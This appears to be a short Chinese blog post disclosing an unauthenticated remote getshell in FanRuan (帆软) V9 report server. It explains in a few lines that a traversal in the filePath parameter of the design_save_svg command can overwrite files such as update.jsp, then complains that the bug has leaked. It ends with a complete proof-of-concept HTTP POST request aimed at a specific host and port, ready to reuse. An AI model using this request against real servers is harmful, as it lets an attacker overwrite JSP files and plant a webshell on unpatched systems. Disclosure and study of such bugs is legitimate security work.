depy

It is a long and beautiful life.

帆软V9前台无条件GETSHELL

网络安全

关键代码分析:


发现filepath可控但,如果路径中包含svg,就获得最后的路径(比如D:/a/1.svg 则获取1.svg),否则就新建文件。当新建的文件不存在,就根据这个路径创建一个目录。

综上所述,此漏洞为跨目录覆盖存在的文件造成getshell,而根目录下一般会有演示使用的update.jsp,此文件不会对系统有任何影响。可以直接覆盖getshell。其他的就看其他的函数,例如POST数据怎么构造,这里就不做演示,仅提供核心部分的分析。

------------

4.8更新 

去年十二月审计出来的洞 现在看满天飞了 就公开这篇文章吧

我真的很无语 有些人不知道哪里获取来的pdf 想也没想就发出去了

哪怕你自己获取到0day 留着打不好吗?发出去是炫耀自己手上漏洞多还是拿来割韭菜搞热点?

这让我更加坚定有些东西确实不能共享学习了 = 。= 


POC:

POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1
Host: 10.203.192.10:8075
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: text/xml;charset=UTF-8
Content-Length: 48

{"__CONTENT__":"jigesb","__CHARSET__":"UTF-8"}